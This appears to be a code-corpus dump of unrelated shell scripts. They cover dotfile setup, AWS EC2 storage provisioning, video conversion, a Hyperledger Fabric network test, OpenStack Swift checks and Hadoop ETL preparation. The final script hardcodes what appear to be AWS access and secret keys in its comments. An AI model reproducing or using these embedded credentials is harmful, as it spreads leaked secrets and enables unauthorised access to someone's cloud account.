d62ac0477b4c8f7e79495a6f70a0c1ecb7afb989 | Shell | kalisjoshua/dotfiles | /install | UTF-8 | 328 | 3.109375 | 3 | [] | no_license | #! /bin/bash
# Make readline completion case-insensitive for this user.
echo "set completion-ignore-case On" >> ~/.inputrc
# get the bash tab-completion script
curl https://raw.githubusercontent.com/git/git/master/contrib/completion/git-completion.bash -o ~/.git-completion.bash
# Symlink every dotfile from ./custom into $HOME. "$PWD" is quoted so a
# checkout path containing spaces survives; the trailing .* still globs.
for src in "$PWD"/custom/.*
do
    # Skip directories — this also filters out the '.' and '..' entries
    # matched by the .* glob.
    if [ ! -d "$src" ]; then
        ln -fs "$src" "$HOME/$(basename "$src")"
    fi
done
| true |
1f36540c1672f203b95b4d68e7e386825e97ee35 | Shell | pmontp19/docker-facturascripts | /facturascripts.sh | UTF-8 | 177 | 2.625 | 3 | [] | no_license | #!/usr/bin/env bash
FILE=/var/www/html/.htaccess
# First run only (no .htaccess yet): seed the web root from the bundled
# sources, then open write permission for the web server. `&&` replaces
# the old `; \` join so a failed copy no longer still chmods the tree.
if [ ! -f "$FILE" ]; then
    cp -r /usr/src/facturascripts/* /var/www/html/ && \
    chmod -R o+w /var/www/html
fi
# Hand PID 1 duties to Apache in the foreground.
apache2-foreground
901401d4ebdeac6dee649ff018c422b8a9a7d6e3 | Shell | wasimj/ephemeral-storage | /ephemeral.sh | UTF-8 | 922 | 3.21875 | 3 | [] | no_license | #!/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin
export PATH
# EC2 metadata names devices "sdX" but the Xen guest sees them as "xvdX".
blockprefix=sd
xenprefix=xvd
stripes=0
lvmdevs=
vg=ec2
lv=ephemeral
ec2_api_url="http://169.254.169.254/latest"
# Only discover devices if the volume group doesn't exist yet (idempotent
# across reboots).
if ! vgs ${vg} >/dev/null 2>&1; then
# Ask the instance metadata service for all ephemeral block mappings.
ephdevs=$( curl -s -XGET ${ec2_api_url}/meta-data/block-device-mapping/ |grep ephemeral )
for tdev in $ephdevs; do
dev=$( curl -s -XGET ${ec2_api_url}/meta-data/block-device-mapping/$tdev )
dev="/dev/"${dev/$blockprefix/$xenprefix}
# Only count mappings that are actually present as block devices.
if [ -b "$dev" ]; then
# NOTE(review): $[ ... ] is deprecated arithmetic syntax — $(( ... ))
# is the modern equivalent.
stripes=$[ $stripes + 1 ]
lvmdevs=${lvmdevs}" $dev"
fi
done
fi
# Build one striped logical volume spanning every ephemeral disk, format
# it ext4 and mount it under /opt/<lv>.
pvcreate $lvmdevs
vgcreate ${vg} $lvmdevs
lvcreate -n ${lv} -l 100%FREE -i $stripes ${vg}
mkfs.ext4 -L ${lv} /dev/mapper/${vg}-${lv}
mkdir -p /opt/${lv}
mount /dev/mapper/${vg}-${lv} /opt/${lv}
# local initialization
if [ -f /etc/default/ec2-prepare-ephemeral-storage ]; then
. /etc/default/ec2-prepare-ephemeral-storage
fi
exit 0
c68a3a0886c1a975a62619176ff673c0ae3b2e09 | Shell | t04glovern/udemy-video-utils | /convert-and-build.sh | UTF-8 | 447 | 2.6875 | 3 | [] | no_license | #!/bin/bash
cd input
for line in *.mp4;
do name=`echo $line | cut -d'.' -f1`;
echo $line;
echo $name;
ffmpeg -i $line -i ../media/base/icon.png -filter_complex "overlay=10:main_h-overlay_h-10" "../output/${name}-layered.mp4"
ffmpeg -i ../media/base/intro.mp4 -i "../output/${name}-layered.mp4" -filter_complex "[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=unsafe=1:n=2:v=1:a=1 [v] [a]" -map "[v]" -map "[a]" "../output/${name}-v2.0.mp4"
done
| true |
e8eb99cc21406d59f8c268c70a18cf10cdc9c649 | Shell | syn2cat/pidor | /scripts/rsyslog-mikrotik.sh | UTF-8 | 490 | 3.265625 | 3 | [] | no_license | #!/bin/bash
exec 2>/tmp/out.log
set -x
PATH=/bin:/usr/bin
mkdir /run/dhcp-leases 2>/dev/null
while read l
do
ip="$(echo "$l" |
fgrep Address-Request|
fgrep "10.2.113" |
sed 's/^.* //')"
if [ "$ip" != "" ]
then
t=$(date +%s)
if [ -f "/run/dhcp-leases/$ip" ]
then
touch "/run/dhcp-leases/$ip"
else
logget -t $(basename $0) "new dhcp for $ip"
echo "$t" > "/run/dhcp-leases/$ip"
fi
echo "========== $t $ip" >> /tmp/out.log
fi
done
| true |
9ddcbe0950658cf12593a46b7f3c9f0780a3e886 | Shell | siyuanzhao/dissertation | /cfrnet/assistments_exp.sh | UTF-8 | 395 | 2.578125 | 3 | [
"MIT"
] | permissive | ps=$1
sea=$2
cnt=50
rname='lstm-autoencoder/results/'$1'_result.pkl'
directory='cfrnet'
mkdir results
if [ -d "$directory/results/$ps" ]
then
rm -rf $directory/results/$ps
fi
mkdir $directory/results/$ps
python $directory/cfr_param_search.py $directory/configs/assistments_exp.txt $cnt $ps $sea $rname
python $directory/evaluate.py $directory/configs/assistments_exp.txt 1 $sea $rname $ps
| true |
1d6f6f9c643b296a70929ffa9bae7ed38989b80e | Shell | joeyjoey1234/pterodactyl-egg-adminer-apache2 | /Final script admino Pterodactyl.txt | UTF-8 | 2,491 | 2.703125 | 3 | [] | no_license | #!/bin/bash
# joeys adminer scripppy
#
# Server Files: /mnt/server
printf '#!/bin/sh\nexit 0' > /usr/sbin/policy-rc.d
apt-get update
apt-get install dialog apt-utils -y
apt-get -y dist-upgrade
apt-get -y upgrade
export DEBIAN_FRONTEND=noninteractive
apt update
apt-get -y upgrade
apt-get update --fix-missing
apt-get install -y adminer
apt-get install curl
a2enmod ssl
mkdir /mnt/server/var/
mkdir /mnt/server/var/www/
mkdir /mnt/server/var/www/html
curl https://raw.githubusercontent.com/joeyjoey1234/pterodactyl-egg-adminer-apache2/main/conf.php > /mnt/server/var/www/html/conf.php
cp -R /usr/share/adminer /mnt/server
rm /var/www/html/index.html
cp /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/
rm /etc/apache2/sites-enabled/000-default.conf
sed -i '5s\.*\ DocumentRoot /home/container/var/www/html/conf.php \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '2s/.*/ DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm /' /etc/apache2/mods-enabled/dir.conf
sed -i '2s\.*\ <VirtualHost _default_:'"${SERVER_PORT}"'> \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '8s/.*/ Listen '"${SERVER_PORT}"'/' /etc/apache2/ports.conf
sed -i '12s/.*/ Listen '"${SERVER_PORT}"'/' /etc/apache2/ports.conf
sed -i '226s/.*/ServerName '"${SERVER_DOMAINNAME}"'/' /etc/apache2/apache2.conf
echo -e ''"${PEM_KEY}"'' > /mnt/server/${SERVER_DOMAINNAME}.pem
echo -e ''"${CERT_KEY}"'' > /mnt/server/${SERVER_DOMAINNAME}.key
sed -i '69s\.*\ServerRoot "/home/container/apache2/"\' /etc/apache2/apache2.conf
sed -i '32s\.*\ SSLCertificateFile /home/container/'"${SERVER_DOMAINNAME}"'.pem \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '134s\.*\ErrorLog /home/container/error.log \' /etc/apache2/apache2.conf
sed -i '33s\.*\ SSLCertificateKeyFile /home/container/'"${SERVER_DOMAINNAME}"'.key \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '13s\.*\ ErrorLog /home/container/error.log \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '14s\.*\ CustomLog /home/container/access.log combined \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '2s\.*\CustomLog /home/container/other_vhosts_access.log vhost_combined \' /etc/apache2/conf-enabled/other-vhosts-access-log.conf
sed -i '87s\.*\PidFile /home/container/apache2.pid \' /etc/apache2/apache2.conf
sed -i '170s\.*\<Directory /home/container/var/www/> \' /etc/apache2/apache2.conf
cp -R /etc/apache2 /mnt/server
| true |
76a1fd4bfaec8b71ad30bd00e9601813f4c68ef3 | Shell | solgenomics/sgn | /bin/jbrowse_vcf_tools/generate_indiv_vcfs.sh | UTF-8 | 2,224 | 4 | 4 | [
"MIT"
] | permissive | #!/bin/bash
#-------------------------------------------------------------------------------------------------------------------------------
# NAME
#
# generate_indiv_vcfs.sh
#
# SYNOPSIS
# Shell script for creating multiple versions of individual VCF files from a single multivcf and imputed dosage file.
#
# ./generate_indiv_vcfs.sh -v [multivcf file] -d [dosage file]
#
# To run, this script requires create_indiv.pl
# finish_indiv.pl
#-------------------------------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------
# 1 Parse command line arguments:
#-------------------------------------------------------------------------------
while [[ $# > 1 ]]
do
key="$1"
case $key in
-v|--multi.vcf)
MULTI_VCF="$2"
shift
;;
-d|--dosage)
DOSAGE="$2"
;;
esac
shift
done
echo MULTI_VCF = "$MULTI_VCF"
echo DOSAGE = "$DOSAGE"
if [ -z "$MULTI_VCF" ] || [ -z "$DOSAGE" ]
then
echo "Trouble reading command line arguments, make sure
-v [multi vcf file] and
-d [dosage file] are both specified";
exit
fi
#----------------------------------------------------------------------------------
# 2 create a nearly empty vcf file for each accession in the multi-vcf
#----------------------------------------------------------------------------------
echo Creating starter vcf files...
mkdir output
./create_indiv.pl -v $MULTI_VCF -o output
#--------------------------------------------------------------------------------
# 3 add genotype data to complete indiv vcf files. then generate filt and imputed files too. Requires long operations, so do it in parallel to speed it up
#-------------------------------------------------------------------------------
ls output/* | parallel -j 30 --gnu --verbose "./finish_indiv.pl -v $MULTI_VCF -d $DOSAGE -f {}"
| true |
dbcc796c49eec628267eb844b92c22db068cafae | Shell | youngzil/quickstart-framework | /quickstart-linux/docs/greplog2/greplog.sh | UTF-8 | 840 | 3.234375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -e
echo "#!/bin/bash">>temp.sh
mainAcct=$1
token=$2
function trusthost()
{
commandStr="cd /data/logs/aifgw-dmz-security;";
commandStr="${commandStr} grep -rn $mainAcct oauth2-server-error*.log >> ${host}.log;"
commandStr="${commandStr} grep -rn 'Token无效' oauth2-server-error*.log | grep $token >> ${host}.log;"
echo "ssh -t $host \" ${commandStr} \" &>/dev/null">>temp.sh
echo "scp $host:/data/logs/aifgw-dmz-security/${host}.log .;">>temp.sh
echo "ssh -t $host \"cd /data/logs/aifgw-dmz-security;rm -rf ${host}.log;\" &>/dev/null">>temp.sh
}
cat hostlist|while read line
do
host=`echo "$line"|awk '{print $1}'`
trusthost
done
echo "cat 10.72.*.log > merge.log ">>temp.sh
echo "rm 10.72.*.log ">>temp.sh
chmod +x *.sh
sh temp.sh
rm temp.sh
| true |
8c16a1bc5f7bfa6f2201524055b747a9ec6a7149 | Shell | akshu3398/sudoku | /docs/sudokugen/lib/games/makeindices.sh | UTF-8 | 183 | 3.125 | 3 | [] | no_license | #!/bin/sh
for dir in *; do
if [ -d "$dir" ]; then
find "$dir" -type f > "$dir.index"
fi
done
find */ -type f >Any.index
for i in *index; do echo -n $i; wc "$i"; done
| true |
4eb4093a2967b399d3f08264bf2f3044be6dcfe5 | Shell | aka00142/cfg2html-all | /sun/list_disks | UTF-8 | 1,866 | 3.5625 | 4 | [] | no_license | #!/bin/ksh
get_disk_lines () {
format <<-EOF | nawk '/^ *[0-9]+\. / {printf "%s %s\n", $2, $3}' | tr -d '<>'
EOF
}
calc_disk_size () {
# compute capacity using method for SATA disks.
# VTOC on most disks in a x4500 is different than most Sun servers
hd_size=`prtvtoc $dev_path 2> /dev/null |\
nawk '
/bytes.sector/ {B_per_sec = $2}
/accessible sec/ {sec = $2}
END { B = B_per_sec * sec;
GB = B / 1024 / 1024 / 1024;
printf "%d\n", GB}
'`
# if computation of disk space = 0, try alternate method...
# to parse other VTOC header format
if [ $hd_size -eq 0 ]; then
hd_size=`prtvtoc $dev_path 2> /dev/null |\
nawk '
/bytes.sector/ {B_per_sec = $2}
/sectors.track/ {sec_per_trk = $2}
/tracks.cylinder/ {trk_per_cyl = $2}
/[0-9] cylinders$/ {cyl = $2}
END {B = B_per_sec * sec_per_trk * trk_per_cyl * cyl;
GB = B / 1024 / 1024 / 1024;
printf "%d\n", GB}
'`
fi
printf "$disk $type $hd_size GB\n";
}
IFS='
'
printf "DEV TYPE SIZE\n";
for line in `get_disk_lines`; do
disk=`echo $line | awk '{print $1}'`;
type=`echo $line | awk '{print $2}'`;
done='false'
for slice in s0 s2 ""; do
dev_path=/dev/rdsk/${disk}${slice}
prtvtoc $dev_path >/dev/null 2>&1
if [ $? -eq 0 -a $done = 'false' ]; then
calc_disk_size
done='true'
fi
done
done
exit 0
#
| true |
9352b281b7adf51e1c40507891b6c3b61a3819a9 | Shell | heartbreaker1411/archlinux-pkgbuilds | /excat/PKGBUILD | UTF-8 | 499 | 2.5625 | 3 | [] | no_license | _p=excat
pkgname=${_p}
pkgver=0.3
pkgrel=1
pkgdesc="Tool to decompress any format using libarchive."
arch=('i686' 'x86_64')
url="http://excat.sf.net"
license=('BSD')
groups=()
depends=('libarchive')
makedepends=()
provides=()
conflicts=()
replaces=()
backup=()
options=(!emptydirs)
install=
source=(excat.c)
sha256sums=('f20099bbb3e27e2df5118319187ff05c0d56fb17a242db3a2a1ffb09121ee272')
build() {
cc -larchive excat.c -o excat
}
package() {
install -D -m0755 excat "${pkgdir}/usr/bin/excat"
}
| true |
c4aef32cfe064a140c13efe2756681325799eee1 | Shell | litx/fabric-samples | /first-network/scripts/script.sh | UTF-8 | 8,986 | 3.296875 | 3 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | #!/bin/bash
echo
echo " ____ _____ _ ____ _____ "
echo "/ ___| |_ _| / \ | _ \ |_ _|"
echo "\___ \ | | / _ \ | |_) | | | "
echo " ___) | | | / ___ \ | _ < | | "
echo "|____/ |_| /_/ \_\ |_| \_\ |_| "
echo
echo "Build your first network (BYFN) end-to-end test"
echo
CHANNEL_NAME="$1"
DELAY="$2"
LANGUAGE="$3"
: ${CHANNEL_NAME:="mychannel"}
: ${TIMEOUT:="10"}
: ${LANGUAGE:="golang"}
LANGUAGE=`echo "$LANGUAGE" | tr [:upper:] [:lower:]`
COUNTER=1
MAX_RETRY=5
ORDERER_CA=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/ordererOrganizations/example.com/orderers/orderer.example.com/msp/tlscacerts/tlsca.example.com-cert.pem
CC_SRC_PATH="github.com/chaincode/chaincode_example02/go/"
if [ "$LANGUAGE" = "node" ]; then
CC_SRC_PATH="/opt/gopath/src/github.com/chaincode/chaincode_example02/node/"
fi
echo "Channel name : "$CHANNEL_NAME
# verify the result of the end-to-end test
verifyResult () {
if [ $1 -ne 0 ] ; then
echo "!!!!!!!!!!!!!!! "$2" !!!!!!!!!!!!!!!!"
echo "========= ERROR !!! FAILED to execute End-2-End Scenario ==========="
echo
exit 1
fi
}
setGlobals () {
PEER=$1
ORG=$2
if [ $ORG -eq 1 ] ; then
CORE_PEER_LOCALMSPID="Org1MSP"
CORE_PEER_TLS_ROOTCERT_FILE=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org1.example.com/peers/peer0.org1.example.com/tls/ca.crt
CORE_PEER_MSPCONFIGPATH=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org1.example.com/users/Admin@org1.example.com/msp
if [ $PEER -eq 0 ]; then
CORE_PEER_ADDRESS=peer0.org1.example.com:7051
else
CORE_PEER_ADDRESS=peer1.org1.example.com:7051
fi
elif [ $ORG -eq 2 ] ; then
CORE_PEER_LOCALMSPID="Org2MSP"
CORE_PEER_TLS_ROOTCERT_FILE=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org2.example.com/peers/peer0.org2.example.com/tls/ca.crt
CORE_PEER_MSPCONFIGPATH=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org2.example.com/users/Admin@org2.example.com/msp
if [ $PEER -eq 0 ]; then
CORE_PEER_ADDRESS=peer0.org2.example.com:7051
else
CORE_PEER_ADDRESS=peer1.org2.example.com:7051
fi
fi
env |grep CORE
}
createChannel() {
setGlobals 0 0
if [ -z "$CORE_PEER_TLS_ENABLED" -o "$CORE_PEER_TLS_ENABLED" = "false" ]; then
peer channel create -o orderer.example.com:7050 -c $CHANNEL_NAME -f ./channel-artifacts/channel.tx >&log.txt
else
peer channel create -o orderer.example.com:7050 -c $CHANNEL_NAME -f ./channel-artifacts/channel.tx --tls $CORE_PEER_TLS_ENABLED --cafile $ORDERER_CA >&log.txt
fi
res=$?
cat log.txt
verifyResult $res "Channel creation failed"
echo "===================== Channel \"$CHANNEL_NAME\" is created successfully ===================== "
echo
}
updateAnchorPeers() {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
if [ -z "$CORE_PEER_TLS_ENABLED" -o "$CORE_PEER_TLS_ENABLED" = "false" ]; then
peer channel update -o orderer.example.com:7050 -c $CHANNEL_NAME -f ./channel-artifacts/${CORE_PEER_LOCALMSPID}anchors.tx >&log.txt
else
peer channel update -o orderer.example.com:7050 -c $CHANNEL_NAME -f ./channel-artifacts/${CORE_PEER_LOCALMSPID}anchors.tx --tls $CORE_PEER_TLS_ENABLED --cafile $ORDERER_CA >&log.txt
fi
res=$?
cat log.txt
verifyResult $res "Anchor peer update failed"
echo "===================== Anchor peers for org \"$CORE_PEER_LOCALMSPID\" on \"$CHANNEL_NAME\" is updated successfully ===================== "
sleep $DELAY
echo
}
## Sometimes Join takes time hence RETRY at least for 5 times
joinWithRetry () {
PEER=$1
ORG=$2
peer channel join -b $CHANNEL_NAME.block >&log.txt
res=$?
cat log.txt
if [ $res -ne 0 -a $COUNTER -lt $MAX_RETRY ]; then
COUNTER=` expr $COUNTER + 1`
echo "peer${PEER}.org${ORG} failed to join the channel, Retry after $DELAY seconds"
sleep $DELAY
joinWithRetry $PEER $ORG
else
COUNTER=1
fi
verifyResult $res "After $MAX_RETRY attempts, peer${PEER}.org${ORG} has failed to Join the Channel"
}
joinChannel () {
for org in 1 2; do
for peer in 0 1; do
setGlobals $peer $org
joinWithRetry $peer $org
echo "===================== peer${peer}.org${org} joined on the channel \"$CHANNEL_NAME\" ===================== "
sleep $DELAY
echo
done
done
}
installChaincode () {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
peer chaincode install -n mycc -v 1.0 -l ${LANGUAGE} -p ${CC_SRC_PATH} >&log.txt
res=$?
cat log.txt
verifyResult $res "Chaincode installation on peer${PEER}.org${ORG} has Failed"
echo "===================== Chaincode is installed on peer${PEER}.org${ORG} ===================== "
echo
}
instantiateChaincode () {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
# while 'peer chaincode' command can get the orderer endpoint from the peer (if join was successful),
# lets supply it directly as we know it using the "-o" option
if [ -z "$CORE_PEER_TLS_ENABLED" -o "$CORE_PEER_TLS_ENABLED" = "false" ]; then
peer chaincode instantiate -o orderer.example.com:7050 -C $CHANNEL_NAME -n mycc -l ${LANGUAGE} -v 1.0 -c '{"Args":["init","a","100","b","200"]}' -P "OR ('Org1MSP.member','Org2MSP.member')" >&log.txt
else
peer chaincode instantiate -o orderer.example.com:7050 --tls $CORE_PEER_TLS_ENABLED --cafile $ORDERER_CA -C $CHANNEL_NAME -n mycc -l ${LANGUAGE} -v 1.0 -c '{"Args":["init","a","100","b","200"]}' -P "OR ('Org1MSP.member','Org2MSP.member')" >&log.txt
fi
res=$?
cat log.txt
verifyResult $res "Chaincode instantiation on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME' failed"
echo "===================== Chaincode Instantiation on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME' is successful ===================== "
echo
}
chaincodeQuery () {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
EXPECTED_RESULT=$3
echo "===================== Querying on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME'... ===================== "
local rc=1
local starttime=$(date +%s)
# continue to poll
# we either get a successful response, or reach TIMEOUT
while test "$(($(date +%s)-starttime))" -lt "$TIMEOUT" -a $rc -ne 0
do
sleep $DELAY
echo "Attempting to Query peer${PEER}.org${ORG} ...$(($(date +%s)-starttime)) secs"
peer chaincode query -C $CHANNEL_NAME -n mycc -c '{"Args":["query","a"]}' >&log.txt
test $? -eq 0 && VALUE=$(cat log.txt | awk '/Query Result/ {print $NF}')
test "$VALUE" = "$EXPECTED_RESULT" && let rc=0
done
echo
cat log.txt
if test $rc -eq 0 ; then
echo "===================== Query on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME' is successful ===================== "
else
echo "!!!!!!!!!!!!!!! Query result on peer${PEER}.org${ORG} is INVALID !!!!!!!!!!!!!!!!"
echo "================== ERROR !!! FAILED to execute End-2-End Scenario =================="
echo
exit 1
fi
}
chaincodeInvoke () {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
# while 'peer chaincode' command can get the orderer endpoint from the peer (if join was successful),
# lets supply it directly as we know it using the "-o" option
if [ -z "$CORE_PEER_TLS_ENABLED" -o "$CORE_PEER_TLS_ENABLED" = "false" ]; then
peer chaincode invoke -o orderer.example.com:7050 -C $CHANNEL_NAME -n mycc -c '{"Args":["invoke","a","b","10"]}' >&log.txt
else
peer chaincode invoke -o orderer.example.com:7050 --tls $CORE_PEER_TLS_ENABLED --cafile $ORDERER_CA -C $CHANNEL_NAME -n mycc -c '{"Args":["invoke","a","b","10"]}' >&log.txt
fi
res=$?
cat log.txt
verifyResult $res "Invoke execution on peer${PEER}.org${ORG} failed "
echo "===================== Invoke transaction on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME' is successful ===================== "
echo
}
## Create channel
echo "Creating channel..."
createChannel
## Join all the peers to the channel
echo "Having all peers join the channel..."
joinChannel
## Set the anchor peers for each org in the channel
echo "Updating anchor peers for org1..."
updateAnchorPeers 0 1
echo "Updating anchor peers for org2..."
updateAnchorPeers 0 2
## Install chaincode on peer0.org1 and peer0.org2
echo "Installing chaincode on peer0.org1..."
installChaincode 0 1
echo "Install chaincode on peer0.org2..."
installChaincode 0 2
# Instantiate chaincode on peer0.org2
echo "Instantiating chaincode on peer0.org2..."
instantiateChaincode 0 2
# Query chaincode on peer0.org1
echo "Querying chaincode on peer0.org1..."
chaincodeQuery 0 1 100
# Invoke chaincode on peer0.org1
echo "Sending invoke transaction on peer0.org1..."
chaincodeInvoke 0 1
## Install chaincode on peer1.org2
echo "Installing chaincode on peer1.org2..."
installChaincode 1 2
# Query on chaincode on peer1.org2, check if the result is 90
echo "Querying chaincode on peer1.org2..."
chaincodeQuery 1 2 90
echo
echo "========= All GOOD, BYFN execution completed =========== "
echo
echo
echo " _____ _ _ ____ "
echo "| ____| | \ | | | _ \ "
echo "| _| | \| | | | | | "
echo "| |___ | |\ | | |_| | "
echo "|_____| |_| \_| |____/ "
echo
exit 0
| true |
a68adf49bcf2fc0d6b2b6677a3bb168408d60375 | Shell | dbca-wa/authome | /testmonitoring | UTF-8 | 597 | 2.90625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
if [[ "$1" == "" ]]
then
backend="false"
elif [[ "$1" == "true" ]]
then
backend="true"
else
backend="false"
fi
TEST_RUNNER=authome.testrunners.NoDatabaseTestRunner
export TEST_RUNNER
#source venv/bin/activate && python manage.py test authome --keepdb
if [[ "$backend" == "true" ]]
then
export IGNORE_LOADING_ERROR=True ; poetry run python manage.py test authome --keepdb --pattern="testmonitoring.py" > ./logs/testmonitoring.log 2>&1 &
else
export IGNORE_LOADING_ERROR=True ; poetry run python manage.py test authome --keepdb --pattern="testmonitoring.py"
fi
| true |
ee0d2d2fb0df1e54bf78770f27824be7d61484d0 | Shell | Ninad-cloud/autovm | /swift_verify.sh | UTF-8 | 2,219 | 3.21875 | 3 | [] | no_license | #######[ DEPLYOMENT OF SWIFT-OBJECT STORAG ESERVICE ]########################
#Verification for SWIFT-OBJECT
# Swift Service uses Distributed SQlite Databases
#!/bin/sh
source /root/autovm/globalvar.sh
verfiy_operation(){
# Verify the operation
echo -e "\n\e[36m[ SWIFT_ON_CONTROLLER ] :\e[0m VERIFYING THE SWIFT SERVICE DEPLOYMENT"
service swift-proxy restart
###Source the demo credentials
source ./demo-openrc
echo "$OS_PROJECT_DOMAIN_NAME"
echo "$OS_PROJECT_NAME"
echo "$OS_USER_DOMAIN_NAME"
echo "$OS_USERNAME"
echo "$OS_PASSWORD"
echo "$OS_AUTH_URL"
echo "$OS_IDENTITY_API_VERSION"
echo "$OS_IMAGE_API_VERSION"
echo "---swift stat"
swift stat
sleep 2
if openstack container list | grep container1;then
echo "Container Already Created...!!!"
else
echo "openstack container create container1"
openstack container create container1
fi
#openstack container create container1
echo "This is for Demo Purpose..." > test_file.txt
###Source the demo credentials
source ./demo-openrc
echo "$OS_PROJECT_DOMAIN_NAME"
echo "$OS_PROJECT_NAME"
echo "$OS_USER_DOMAIN_NAME"
echo "$OS_USERNAME"
echo "$OS_PASSWORD"
echo "$OS_AUTH_URL"
echo "$OS_IDENTITY_API_VERSION"
echo "$OS_IMAGE_API_VERSION"
echo "openstack object create container1"
openstack object create container1 test_file.txt
sleep 5
for i in 1 2 3;
do
if openstack object list container1 | grep test_file.txt;then
break
else
echo -e "\nRound $i of list container"
sleep 5
fi
done
echo "create test directory"
mkdir test
cd test
openstack object save container1 test_file.txt
echo "..See The Result..."
cat test_file.txt
###Source the demo credentials
source ./demo-openrc
echo "$OS_PROJECT_DOMAIN_NAME"
echo "$OS_PROJECT_NAME"
echo "$OS_USER_DOMAIN_NAME"
echo "$OS_USERNAME"
echo "$OS_PASSWORD"
echo "$OS_AUTH_URL"
echo "$OS_IDENTITY_API_VERSION"
echo "$OS_IMAGE_API_VERSION"
echo "Verify The Operation....."
if openstack object list container1 | grep test_file.txt;then
echo -e "\n\e[36m#####[ SUCCESSFULLY DEPLOYED SWIFT SERVICE ]######## \e[0m\n"
else
echo -e "\n\e[31m##### SWIFT SERVICE FAILED, EXITING..!! ########### \e[0m\n"
exit
fi
}
verfiy_operation | true |
fcf5391388b537f4e83131b21294d54ec4a3c076 | Shell | xmanswer/Web-Service-Twitter-Analytics | /phase1/phase1_query2_etl/preparation.sh | UTF-8 | 3,164 | 2.53125 | 3 | [] | no_license | sudo apt-get update
sudo apt-get install python-pip
# configue cli
sudo pip install awscli
aws configure
## AWSAccessKeyId=AKIAJWVJUGINPZKLNC5A
## AWSSecretKey=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
## default region = us-east-1
## default format = txt
# copy subsample
aws s3 ls s3://cmucc-datasets/twitter/f15/
sudo apt-get install s3cmd
s3cmd --configure
# configure s3cmd
## Access Key: AKIAJWVJUGINPZKLNC5A
## Secret Key: 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
## Encryption password: hmm
## Path to GPG program [/usr/bin/gpg]: /usr/bin/gpg
## Use HTTPS protocol [No]: False
## HTTP Proxy server name:
## Test access with supplied credentials? [Y/n] y
## Save settings? [y/N] y
s3cmd cp s3://cmucc-datasets/twitter/f15/part-00000 s3://phase1elt/input/
# prepare emr
cd ~/
mkdir etl
sudo apt-get install openjdk-7-jdk
# scp mapper and reducer source code, gson jars, the afinn and banned txt, and a tiny sample subset3.txt to etl
export CLASSPATH=$CLASSPATH:~/etl/gson-2.4-javadoc.jar:~/etl/gson-2.4-sources.jar:~/etl/gson-2.4.jar
javac *.java
jar -cvf ETL.jar *.class
# test mapper and reducer on the single machine
# cat subset3.txt | java ETLMapperPhase1 "/home/ubuntu/etl/afinn.txt" "/home/ubuntu/etl/banned.txt"
cat subset3.txt | java -Duser.timezone=GMT ETLMapperPhase1_v2 /home/ubuntu/etl/afinn.txt /home/ubuntu/etl/banned.txt |sort| java -Duser.timezone=GMT ETLReducerPhase1_v2
# go to emr console, customize the streaming as follows
# using command-runner.jar as JAR location
hadoop-streaming -files s3://phase1elt/src/ETL.jar,s3://phase1elt/src/gson-2.4.jar,s3://phase1elt/src/gson-2.4-javadoc.jar,s3://phase1elt/src/gson-2.4-sources.jar,s3://phase1elt/src/afinn.txt,s3://phase1elt/src/banned.txt -mapper "java -classpath ETL.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLMapperPhase1 afinn.txt banned.txt" -reducer "java -classpath ETL.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLReducerPhase1" -input s3://phase1elt/input/ -output s3://phase1elt/output/ -cmdenv LC_CTYPE=en_GB.UTF-8
hadoop-streaming -files s3://phase1elt/src/ETL_v2.jar,s3://phase1elt/src/gson-2.4.jar,s3://phase1elt/src/gson-2.4-javadoc.jar,s3://phase1elt/src/gson-2.4-sources.jar,s3://phase1elt/src/afinn.txt,s3://phase1elt/src/banned.txt -mapper "java -Duser.timezone=GMT -classpath ETL_v2.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLMapperPhase1_v2 afinn.txt banned.txt" -reducer "java -Duser.timezone=GMT -classpath ETL_v2.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLReducerPhase1_v2" -input s3://phase1elt/input/ -output s3://phase1elt/output_v2/ -cmdenv LC_CTYPE=en_GB.UTF-8
hadoop-streaming -files s3://phase1elt/src/ETL_v3.jar,s3://phase1elt/src/gson-2.4.jar,s3://phase1elt/src/gson-2.4-javadoc.jar,s3://phase1elt/src/gson-2.4-sources.jar,s3://phase1elt/src/afinn.txt,s3://phase1elt/src/banned.txt -mapper "java -Duser.timezone=GMT -classpath ETL_v3.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLMapperPhase1_v3 afinn.txt banned.txt" -reducer "java -Duser.timezone=GMT -classpath ETL_v3.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLReducerPhase1_v3" -input s3://cmucc-datasets/twitter/f15/ -output s3://phase1elt/output_full_v3/ -cmdenv LC_CTYPE=en_GB.UTF-8 | true |
